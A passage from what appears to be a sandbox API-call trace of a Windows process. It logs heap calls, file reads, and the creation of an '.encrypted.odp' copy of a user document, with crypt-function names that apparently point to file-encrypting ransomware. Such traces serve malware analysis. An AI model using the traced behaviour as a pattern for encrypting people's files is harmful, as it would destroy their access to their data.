0x11 [0036.060] PeekMessageW (in: lpMsg=0x6ae344, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae344) returned 0 [0036.060] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0036.060] CryptDestroyHash (hHash=0x7c2100) returned 1 [0036.060] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.060] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.060] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.060] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.060] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.061] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\8Yj2_lqSAK_Ho8rx.odp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd\\8yj2_lqsak_ho8rx.odp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0036.061] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0036.061] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae940 | out: lpNewFilePointer=0x0) returned 1 [0036.061] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0036.061] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb50 [0036.061] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0036.061] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0036.061] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0036.061] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0036.061] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1800 | out: hHeap=0x770000) returned 1 [0036.061] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0036.061] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.061] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1e8 [0036.061] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0036.061] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0036.061] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0036.061] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0036.061] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0036.061] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2100 [0036.061] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.061] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2100 | out: hHeap=0x770000) returned 1 [0036.061] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.061] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1e8 [0036.061] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1800 [0036.061] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0036.061] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0036.061] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0036.061] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0036.061] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0036.061] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0036.062] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1a8 [0036.062] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0036.062] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0036.062] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0036.062] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0036.062] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0036.062] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0036.062] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0036.062] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1a8 [0036.062] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb98 [0036.062] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0036.062] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0036.062] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0036.062] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0036.062] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0036.062] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0036.062] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da238 [0036.062] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0036.062] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0036.062] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0036.062] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc0) returned 0x7c9758 [0036.062] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0036.062] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5c40 [0036.062] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0036.062] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5bb8 [0036.062] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c9758 | out: hHeap=0x770000) returned 1 [0036.062] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0036.062] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0036.062] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da238 | out: hHeap=0x770000) returned 1 [0036.062] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0036.063] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0036.063] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5c40 | out: hHeap=0x770000) returned 1 [0036.063] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0036.063] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0036.063] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0036.063] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0036.063] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5c40 [0036.063] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd")) returned 0x10 [0036.063] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5c40 | out: hHeap=0x770000) returned 1 [0036.063] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0036.063] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5bb8 | out: hHeap=0x770000) returned 1 [0036.063] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0036.063] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0036.063] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0036.063] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2100 [0036.063] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0x945010 [0036.063] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0036.063] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0036.063] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\8Yj2_lqSAK_Ho8rx.encrypted.odp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd\\8yj2_lqsak_ho8rx.encrypted.odp"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0036.063] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1760 [0036.064] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb98 [0036.064] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1a8 [0036.064] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0036.064] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0036.064] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0036.064] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1800 | out: hHeap=0x770000) returned 1 [0036.064] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0036.064] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.064] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1e8 [0036.064] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0036.064] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0036.064] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0036.064] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0036.064] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0036.064] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2280 [0036.064] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.064] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2280 | out: hHeap=0x770000) returned 1 [0036.064] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.064] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2280 [0036.064] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.064] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1e8 [0036.064] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1800 [0036.064] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0036.064] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0036.064] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0036.064] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0036.064] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0036.064] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0036.064] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0036.064] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0036.064] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0036.065] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0036.065] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0036.065] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0036.065] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0036.065] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x100000) returned 0x1090020 [0036.065] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae990 | out: lpNewFilePointer=0x0) returned 1 [0036.065] ReadFile (in: hFile=0x128, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6ae9b8*=0x10000, lpOverlapped=0x0) returned 1 [0036.067] ReadFile (in: hFile=0x128, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6ae9b8*=0x4cd6, lpOverlapped=0x0) returned 1 [0036.067] ReadFile (in: hFile=0x128, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6ae9b8*=0x0, lpOverlapped=0x0) returned 1 [0036.067] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0036.067] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0036.068] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0036.068] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0036.068] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14cd6) returned 0x955018 [0036.068] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x1090020 | out: hHeap=0x770000) returned 1 [0036.069] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0036.069] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0036.069] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1800 | out: hHeap=0x770000) returned 1 [0036.069] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0036.069] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1e8 [0036.069] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14cd6) returned 0x969cf8 [0036.070] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x955018 | out: hHeap=0x770000) returned 1 [0036.072] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0036.072] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.072] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0036.072] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1800 [0036.072] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0036.072] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0036.072] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0036.072] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14cd6) returned 0x955018 [0036.073] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0036.073] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x955018 | out: hHeap=0x770000) returned 1 [0036.074] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0036.074] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0036.074] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1800 | out: hHeap=0x770000) returned 1 [0036.074] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0036.074] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.074] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0036.074] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0036.074] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0036.074] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0036.074] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0036.074] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0036.074] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c22c0 [0036.074] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.074] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0036.074] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0036.074] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0036.074] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0036.074] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0036.074] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0036.074] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1800 [0036.074] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da1c8 [0036.074] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1dc8 [0036.074] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0036.074] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0036.074] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da238 [0036.074] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14cd6) returned 0x955018 [0036.074] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0036.075] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da2a8 [0036.075] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0036.075] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0036.075] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0036.075] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da1f8 [0036.075] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0036.075] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0036.075] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0036.075] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da148 [0036.075] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0036.075] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da248 [0036.075] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da248 | out: hHeap=0x770000) returned 1 [0036.075] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88ce80 [0036.075] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b48 [0036.075] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0036.075] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da248 [0036.075] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0036.075] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da158 [0036.075] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14cd6) returned 0x97e9d8 [0036.076] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c60 [0036.077] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0036.077] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0036.077] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0036.077] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a30 [0036.077] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0036.077] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1828 [0036.077] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0036.077] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2d8 [0036.077] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0036.077] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1940 [0036.077] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0036.077] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2f8 [0036.077] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb68 [0036.077] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0036.077] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.077] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2e8 [0036.077] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0036.077] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2e8 [0036.077] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0036.077] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2300 [0036.077] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.077] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1698 [0036.077] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0036.077] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0036.077] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0036.077] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1af8 [0036.077] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0036.077] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0036.077] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da268 [0036.077] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0036.077] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da308 [0036.077] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0036.078] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: 